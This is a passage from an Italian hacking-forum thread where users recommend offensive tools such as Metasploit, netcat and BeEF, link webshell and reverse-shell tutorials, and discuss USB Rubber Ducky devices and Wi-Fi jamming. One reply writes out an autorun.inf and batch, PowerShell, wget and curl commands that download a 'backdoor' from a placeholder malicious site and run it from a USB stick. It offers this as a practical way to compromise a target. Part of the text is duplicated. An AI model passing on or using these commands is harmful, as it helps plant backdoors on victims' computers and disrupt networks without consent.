- Stato
Tutto dipende da cosa vuoi fare, comunque i tool fondamentali [oltre alle conoscenze di informatica che bisogna avere in ogni occasione], sono netcat, un vulnerability scanner [esempio nikto], metasploit, setoolkit ed nmap e se proprio vuoi mettercelo beef hook,privoxy o socat,una webshell comoda e non pesante, poi tutto il resto lo puoi fare manualmente:
https://www.inforge.net/xi/threads/webshell-come-injectarle-manualmente.477820/
https://www.inforge.net/xi/threads/come-ottenere-una-reverse-shell.477750/
https://www.inforge.net/xi/threads/xss-cross-site-scripting.477899/
: almeno che non devi hackerare la nasa, tutte le altre cose le puoi fare manualmente [naturalmente se devi provare tante cose con un semplice tool di automatizzi le varie cose].
Per il resto anche un target vm da portarti sempre in valigia, potrebbe essere il caso di metasploitable o una vm [ne trovi molte su vulnhub] dove praticare.
Se invece vuoi provare a crearti una webshell tutta tua [e vuoi capire come realizzarne una in appena 16 righe di codice html/php che possono diventare anche 3000, vedi : https://www.inforge.net/xi/threads/webshell-alle-basi-del-web-exploiting.477730/ .
L' importante e' saper programmare e saper cosa fare, poi il resto te lo puoi fare anche sul momento, comunque i tool che ti ho detto sono utili e funzionali: il minimo indispensabile.
https://www.inforge.net/xi/threads/webshell-come-injectarle-manualmente.477820/
https://www.inforge.net/xi/threads/come-ottenere-una-reverse-shell.477750/
https://www.inforge.net/xi/threads/xss-cross-site-scripting.477899/
: almeno che non devi hackerare la nasa, tutte le altre cose le puoi fare manualmente [naturalmente se devi provare tante cose con un semplice tool di automatizzi le varie cose].
Per il resto anche un target vm da portarti sempre in valigia, potrebbe essere il caso di metasploitable o una vm [ne trovi molte su vulnhub] dove praticare.
Se invece vuoi provare a crearti una webshell tutta tua [e vuoi capire come realizzarne una in appena 16 righe di codice html/php che possono diventare anche 3000, vedi : https://www.inforge.net/xi/threads/webshell-alle-basi-del-web-exploiting.477730/ .
L' importante e' saper programmare e saper cosa fare, poi il resto te lo puoi fare anche sul momento, comunque i tool che ti ho detto sono utili e funzionali: il minimo indispensabile.
Secondo me un hacker professionista ha anche bisogno di apparecchi hardware: ad esempio ci sono dispositivi che bloccano tutte le onde wifi, alcune antenne riescono a captare onde senza essere connesso in lan, il computer coperto con lastre di una lega metallica speciale non lascia che i satelliti rintraccino... Inoltre servono anche apparecchi classici come microcamere e microfoni, forse anche dei droni spia...
Я
Яǝʌǝɹsǝ
Я
Яǝʌǝɹsǝ
Я
Яǝʌǝɹsǝ
Ultima modifica:
Bhe' , potersela creare e' abbastanza complicato in termini di capienza pc dato che devi installare un bel po' di roba, ma comunque puoi semplicemente seguire questa guida e fare la tua personal rubber ducky:
https://www.pentestingshop.com/pentesting/make-your-own-usb-rubber-ducky-using-a-normal-usb-stick/
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads [questi sono i payload che potresti sfruttare]
Senno' potresti fare una cosa piu' ........becera e inserire in una chiavetta lo script in powershell/bash per poter poi autorunnarlo [ammesso che sui moderi pc ancora si possa fare] :
Codice:
autorun.inf :
[AutoRun]
Icon=Logo.ico
shellexecute="script.bat"
UseAutoPlay=1poi magari aggiungere un vari moduli che potesti adottare [magari automatizza i processi con bash/powershell]:
script.bat:
Codice:
powershell.exe Invoke-WebRequest -Uri "http://malicious-site.com/backdoor.exe" -OutFile "C:\path\file"
,ma una cosa de genere:
Invoke-WebRequest -Uri https://malicious site.com/ -OutFile C:"\path\file" -Credential "UserName"
significherrebbe che anche se trovassero il sorgente da dove scarichi la backdoor, dovrebbero effettuare l' accesso al web server. [Non cambia molto dato che comunque trovano moltissime info anche senza]Se invece fosse per linux:
Bash:
wget http://malicious site.com/backdoor.sh
oppure
curl -o nomebackdoor.sh http://maliciosusite.com/backdoor.shPoi per runnarle potresti fare:
Codice:
bash /disco/dir/path/file.sh
o
powershell.exe C:/dir/path/file.exePoi naturalmente, magari prima sarebbe meglio poter controllare maggiori info sul target e poter eseguire direttamente la backdoor invece che uno script che la scarica [come ti ho fatto vedere ora], comunque dipende da te. Poi tutto il resto lo fai come moduli che puoi adottare e scaricare dal server quando vuoi: sarebbe bello una cosa veloce veloce ma potente, comunque bisogna avere la conoscenze minime, poi magari ci metti pure la backdoor in locale di metasploit............pero' e' consigliato farsene una ....."artigianale" ben fatta.
PS: Per l' autorun, ho visto che i moderni sistemi adottano l impostazione autoplay che deve essere attiva, quindi ond evitare cose inutili, prova, comunque fino a win 8.1 dovrebbe andare.
Per Linux l' autorun dovresti farlo cosi':
Bash:
#!/bin/sh
xdg-open script.shinoltre dopo il recent scandalo CIA tools di wikileaks, e' stato pubblicato anche il tool brutal kangaroo: dagli un' occhiata : https://wikileaks.org/vault7/#Brutal Kangaroo .
il tutorial che mi hai consigliato lo avevo gia visto e il tutto si basa sun particolare chip della phison il 2303 (mi pare) che è montato su una lista non ben definita di chiavette usb tempo fa ne acquistai una che avrebbe dovuto avere il suddetto chip, che poi in realtà non aveva e che quindi presi una fregatura.
Я
Яǝʌǝɹsǝ
brav'
e non dare retta al post sopra. non c'entra niente l'autorun con la rubber ducky
Dispositivi che bloccano le onde? Intendi dei muri in piombo portatili?
Alessandro Nava
Per bloccare cellulari/onde radio:
https://it.wikipedia.org/wiki/Jammer_telefonico
Per bloccare wifi:
Non bloccano le onde, dato che, come ho detto solo un materiale conduttore può schermare dalle onde radio. Un jammer semplicemente trasmette dati casuali sulla banda del servizio in modo che eventuali trasmissioni valide vengono rese non valide. Per "bloccare" il wifi, mi pare sia un semplice raspi con un'antenna wifi che manda pacchetti di deauth, niente di più...
Alessandro Nava
È vero, però se non puoi permetterti di portare un pc con determinate caratteristiche in giro (e per qualche motivo devi dossare una rete) può essere molto utile un dispositivo simile.
Non ho detto che è inutile, ho solo precisato la differenza tra disturbare la banda di un servizio e "bloccare le onde".
Alessandro Nava
- Stato
DISCUSSIONI SIMILI
- Chiuso
-
- 1
-
- 246
- Chiuso
-
- 4
-
- 399